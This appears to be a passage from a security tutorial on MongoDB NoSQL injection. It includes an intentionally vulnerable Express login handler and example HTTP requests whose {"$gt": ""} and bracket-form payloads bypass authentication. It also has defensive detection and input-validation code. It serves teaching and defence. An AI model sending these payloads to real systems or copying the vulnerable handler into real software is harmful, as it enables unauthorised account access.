MongoDB

If the application source looks like the handler below, the attacker controls the values of the JSON keys that end up in the query.

app.post('/', function (req, res) {
  // Vulnerable: req.body values are passed straight into the query object,
  // so a nested JSON value such as {"$gt": ""} is interpreted as an operator.
  db.users.find({ username: req.body.username, password: req.body.password }, function (err, users) {
    // TODO: handle the rest
  });
});

JSON Greater Than overwrite

A normal request with the JSON body {"username": "test", "password": "abc123"} produces the expected query.

But an injected request with the JSON body {"username": {"$gt": ""}, "password": {"$gt": ""}} produces an injection.

$gt is a MongoDB query operator: the greater-than comparison. Comparing against the empty string "" matches every non-empty value, so the condition effectively always evaluates to true.

Example Request:

POST http://target/ HTTP/1.1
Content-Type: application/json

{ "username": {"$gt": ""}, "password": {"$gt": ""} }

Form Body Greater Than overwrite

This can also be done with regular form body parameters.

Example Request:

POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username[$gt]=&password[$gt]=

A body parser that supports bracket notation (such as Express's extended urlencoded parser) turns username[$gt]= into the same nested {"$gt": ""} object, so the greater-than operator is again applied against an empty value and the comparison matches.
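The JSON and form-body variants above, seen from the defending side, as an added example that is not code from the original page. parseBracketForm is a deliberately minimal stand-in for an extended urlencoded parser, and containsOperatorKeys and buildLoginQuery are hypothetical helper names; the sample bodies are constructed.

```javascript
// Minimal stand-in for an extended urlencoded parser (assumption, not a real
// library): "a[b]=v" -> { a: { b: "v" } }, "a=v" -> { a: "v" }.
function parseBracketForm(text) {
  const out = {};
  for (const pair of text.split('&')) {
    const [rawKey, rawVal = ''] = pair.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      (out[m[1]] = out[m[1]] || {})[m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Detection: walk a parsed body and flag any key starting with "$",
// which is how MongoDB operators such as $gt and $ne are spelled.
function containsOperatorKeys(value) {
  if (Array.isArray(value)) return value.some(containsOperatorKeys);
  if (value !== null && typeof value === 'object') {
    return Object.keys(value).some(
      (k) => k.startsWith('$') || containsOperatorKeys(value[k])
    );
  }
  return false;
}

// Mitigation: credentials must be plain strings before they reach the
// query, so an object like {"$gt": ""} can never become an operator.
function buildLoginQuery(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return { username: username, password: password };
}

// Constructed sample bodies: a normal login, the injected JSON body, and
// the injected form body after bracket parsing.
const normalBody = { username: 'test', password: 'abc123' };
const injectedJsonBody = { username: { $gt: '' }, password: { $gt: '' } };
const injectedFormBody = parseBracketForm('username[$gt]=&password[$gt]=');

console.log(containsOperatorKeys(normalBody));       // false
console.log(containsOperatorKeys(injectedJsonBody)); // true
console.log(containsOperatorKeys(injectedFormBody)); // true
```

Both injected bodies are caught by the key check, and buildLoginQuery rejects them outright because the credential values are objects rather than strings.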

Other special operators